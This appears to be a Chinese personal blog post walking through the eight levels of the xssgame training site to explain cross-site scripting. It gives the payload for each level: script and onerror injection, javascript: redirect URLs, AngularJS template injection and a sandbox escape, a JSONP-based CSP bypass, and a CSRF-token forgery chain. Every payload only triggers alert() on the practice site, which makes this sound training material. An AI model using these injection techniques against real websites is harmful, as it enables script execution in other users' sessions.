<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/blog/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/blog/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/blog/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/blog/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/blog/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/blog/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/blog/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="简介​ XSS又叫跨站脚本攻击 ​ 一言以蔽之，XSS就是通过往页面植入js脚本达到一定目的。理论上，所有可以输入的地方没有对数据进行一定处理，都存在XSS漏洞。 ​ 我们就通过xssgame的八道题目，由浅入深的理解一下xss的不同类型。（需要翻墙食用）">
<meta property="og:type" content="article">
<meta property="og:title" content="简单理解XSS">
<meta property="og:url" content="https://catchmenow.gitee.io/blog/2018/07/16/57/index.html">
<meta property="og:site_name" content="ssilent&#39;s blog">
<meta property="og:description" content="简介​ XSS又叫跨站脚本攻击 ​ 一言以蔽之，XSS就是通过往页面植入js脚本达到一定目的。理论上，所有可以输入的地方没有对数据进行一定处理，都存在XSS漏洞。 ​ 我们就通过xssgame的八道题目，由浅入深的理解一下xss的不同类型。（需要翻墙食用）">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2020-01-31T05:31:19.905Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="简单理解XSS">
<meta name="twitter:description" content="简介​ XSS又叫跨站脚本攻击 ​ 一言以蔽之，XSS就是通过往页面植入js脚本达到一定目的。理论上，所有可以输入的地方没有对数据进行一定处理，都存在XSS漏洞。 ​ 我们就通过xssgame的八道题目，由浅入深的理解一下xss的不同类型。（需要翻墙食用）">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/blog/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'ssilent'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://catchmenow.gitee.io/blog/2018/07/16/57/">





  <title>简单理解XSS | ssilent's blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <a href="https://github.com/Mitsushima0" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewbox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
    
    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/blog/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ssilent's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/blog/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/blog/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/blog/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/blog/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://catchmenow.gitee.io/blog/blog/2018/07/16/57/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ssilent">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/blog/images/p2.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ssilent's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">简单理解XSS</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-07-16T23:00:45+08:00">
                2018-07-16
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/blog/categories/Web/" itemprop="url" rel="index">
                    <span itemprop="name">Web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/blog/2018/07/16/57/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/blog/2018/07/16/57/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  933
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  4
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>​ XSS又叫跨站脚本攻击 ​ 一言以蔽之，XSS就是通过往页面植入js脚本达到一定目的。理论上，所有可以输入的地方没有对数据进行一定处理，都存在XSS漏洞。 ​ 我们就通过xssgame的八道题目，由浅入深的理解一下xss的不同类型。（需要翻墙食用）<br><a id="more"></a></p>
<h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><p><a href="http://www.xssgame.com/m4KKGHi2rVUN" target="_blank" rel="noopener"><strong>Level 1</strong></a> <strong>直接构造</strong> 构造<em>script</em>命令<code>&lt;script&gt;alert(&#39;xsss&#39;)&lt;/script&gt;</code> <a href="http://www.xssgame.com/WrfpuKFX8GNr" target="_blank" rel="noopener"><strong>Level 2</strong></a> <strong>拼接字符串</strong> 法一：利用<em>onload</em>事件，构造<code>1&#39;+aler()+&#39;1</code> 法二：利用url构造，注意将<code>+</code>转义成<code>%2b</code>,<code>-</code>不用转义 <a href="http://www.xssgame.com/u0hrDTsXmyVJ" target="_blank" rel="noopener"><strong>Level 3</strong></a> <strong>图片加载执行</strong> 利用<em>img</em>标签加载错误，执行<em>onerror</em> 构造<code>1&#39; onerror=&#39;alert(&quot;xss&quot;)&#39;</code>来截断<em>img</em> <a href="http://www.xssgame.com/__58a1wgqGgI" target="_blank" rel="noopener"><strong>Level 4</strong></a> <strong>重定向</strong> 利用页面重定向操作，构造<em>url</em></p>
<pre><code>&lt;script&gt;
   setTimeout(function() { window.location = &apos;welcome&apos;; }, 1000);
&lt;/script&gt;
</code></pre><p>改变传入参数为<code>javascript:alert()</code>，构造url为<code>confirm?next=javascript:alert()</code> <a href="&quot;http://www.xssgame.com/f/JFTG_t7t3N-P/&quot;"><strong>Level</strong> <strong>5</strong></a> <strong>Angular框架</strong></p>
<pre><code> &lt;script&gt;
      angular.module(&apos;myApp&apos;, [])
      .controller(&apos;myController&apos;, [&apos;$scope&apos;, function ($scope) {
        $scope.query = &quot;&quot;;
        $scope.alert = window.alert;
      }]);
  var UTM_PARAMS = [&quot;utm_content&quot;, &quot;utm_medium&quot;, &quot;utm_source&quot;,
      &quot;utm_campaign&quot;, &quot;utm_term&quot;]

  if (location.search)
  {
    var params = location.search.substring(1).split(&apos;&amp;&apos;);

    for (var p in params) {
      var r = params[p].split(&apos;=&apos;);

      if (r.length == 2 &amp;&amp; UTM_PARAMS.indexOf(r[0]) != -1) {
        var el = document.getElementsByName(r[0]);
        if (el.length) el[0].value = decodeURIComponent(r[1]);
      }
    }
  }
&lt;/script&gt;
</code></pre><p>理解一下明白了，把输入参数过滤了，分别对应页面的不同节点赋值 给angular中传入函数alert，php写法是{ {alert()}} 因此构造url<code>?utm_campaign={ {alert()}}</code> <a href="&quot;http://www.xssgame.com/rWKWwJGnAeyi&quot;"><strong>Level 6</strong></a> <strong>Angular框架</strong> 利用了一个angularjs1.2.0的版本漏洞，构造url</p>
<pre><code>query=&amp;lcub;&amp;lcub;a=&apos;constructor&apos;;b=&amp;lcub;&amp;rcub;;a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,&apos;alert()&apos;)()&amp;rcub;&amp;rcub;
</code></pre><p>不大懂。。。社工题吧 <a href="&quot;http://www.xssgame.com/wmOM2q5NJnZS&quot;"><strong>Level 7</strong></a> <strong>CSP</strong> 利用jsonp的callback传参，绕过页面的csp策略 构造url <code>?menu=&lt;script src=&#39;jsonp?callback=alert();//&#39;&gt;&lt;/script&gt;</code> 其中；需要转义成%3B，在通过btoa base64编码 得到 <code>?menu=PHNjcmlwdCBzcmM9J2pzb25wP2NhbGxiYWNrPWFsZXJ0KCklM2IvLyc+PC9zY3JpcHQ+</code> <a href="&quot;http://www.xssgame.com/d9u16LTxchEi&quot;"><strong>Level 8</strong></a> <strong>CSRF</strong> 输入几条数据，观察url的变化 <code>http://www.xssgame.com/f/d9u16LTxchEi/set?name=name&amp;value=1234&amp;redirect=index</code> <code>http://www.xssgame.com/f/d9u16LTxchEi/transfer?name=adas&amp;amount=12&amp;csrf_token=42391TSWBC</code> 发现第二个url会回显amout的值，考虑可以利用，构造url <code>http://www.xssgame.com/f/d9u16LTxchEi/transfer?name=adas&amp;amount=%3Cscript%3Ealert()%3C/script%3E&amp;csrf_token=42391TSWBC</code> （注：&lt;&gt;需要分别替换为%3C %3E否则会被过滤） 这时候得到以下结果：</p>
<blockquote>
<p>You executed an alert, but the server side validation of your solution failed. It probably means that your solution requires user interaction, or is not generic enough to work for a different user. Please try to make it work without user interaction and generic enough so that it works for any user. It might also be caused by the use of absolute URL references - please avoid those.</p>
</blockquote>
<p>看来，和csrf_token有关，每个用户的token不一样，需要构造 此时，可以利用第一条url构造，首先对csrf_token进行伪造 <code>http://www.xssgame.com/f/d9u16LTxchEi/set?name=name&amp;value=1234&amp;redirect=index</code> set?name=csrf_token&amp;value=yes&amp;redirect=transfer?name=adas&amp;amount=%3Cscript%3Ealert()%3C/script%3E&amp;csrf_token=yes 上面是草稿，因为直接这么访问，redirect的内容会到&amp;截断，需要对redirect后面的内容进行encodeURIComponent处理一下， 得到url <code>http://www.xssgame.com/f/d9u16LTxchEi/set?name=csrf_token&amp;value=yes&amp;redirect=transfer%3Fname%3Dadas%26amount%3D%253Cscript%253Ealert()%253C%2Fscript%253E%26csrf_token%3Dyes</code></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>首先要查看页面的主要html源码和js代码，搞清楚跳转关系以及js主要功能（搞不清就通过尝试输入看变化），特别是通过network查看请求url的变化，因为xss题目最重要就是构造url。然后，很多时候不成功都是因为编码问题。最后要学会社工，像那道angular，利用的就是历史版本的漏洞。</p>

      
    </div>
    
    
    

    <div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>本文标题:</span><a href="/blog/2018/07/16/57/">简单理解XSS</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 ssilent 的个人博客">ssilent</a></p>
  <p><span>发布时间:</span>2018年07月16日 - 23:00</p>
  <p><span>最后更新:</span>2020年01月31日 - 13:31</p>
  <p><span>原始链接:</span><a href="/blog/2018/07/16/57/" title="简单理解XSS">https://catchmenow.gitee.io/blog/2018/07/16/57/</a>
    <span class="copy-path" title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="https://catchmenow.gitee.io/blog/2018/07/16/57/" aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>
</div>
<script>
    var clipboard = new Clipboard('.fa-clipboard');
    $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({
          title: "",
          text: '复制成功',
          icon: "success",
          showConfirmButton: true
          });
  });
    });
</script>

      
    </div>

    <div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-heartbeat"></i>感谢您的阅读-------------</div>
    
</div>
      
    </div>

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/blog/2018/05/04/38/" rel="next" title="scrapy+selenium+chromedriver 爬取动态网页">
                <i class="fa fa-chevron-left"></i> scrapy+selenium+chromedriver 爬取动态网页
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/blog/2019/01/27/1/" rel="prev" title="虚拟机源码安装Tor并与ss+privoxy搭配使用">
                虚拟机源码安装Tor并与ss+privoxy搭配使用 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/blog/images/p2.jpg" alt="ssilent">
            
              <p class="site-author-name" itemprop="name">ssilent</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/blog/archives/">
              
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/blog/categories/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/blog/tags/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#简介"><span class="nav-number">1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#题目"><span class="nav-number">2.</span> <span class="nav-text">题目</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">3.</span> <span class="nav-text">总结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ssilent</span>

  
</div>

<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>


<!--

 <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>

  -->


  <span class="post-meta-divider">|</span>


<!--

  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>

-->



<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共17k字</span>
</div>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/blog/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/blog/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/blog/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/blog/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/blog/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/blog/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/blog/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/blog/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script>

  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: 'lYp2MtSUmdwhTqLdx7PMPM2R-gzGzoHsz',
        appKey: 'tuvkxTJOf6ngjmCMKwn7e5TS',
        placeholder: '旺仔QQ糖，你也要来一颗吗？',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  





  

  

  

  
  

  

  

  

  
  
  
<script src="/blog/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"live2d-widget-model-shiziku"},"display":{"position":"left","width":75,"height":150},"mobile":{"show":true},"log":false,"tagMode":false});</script></body>
</html>
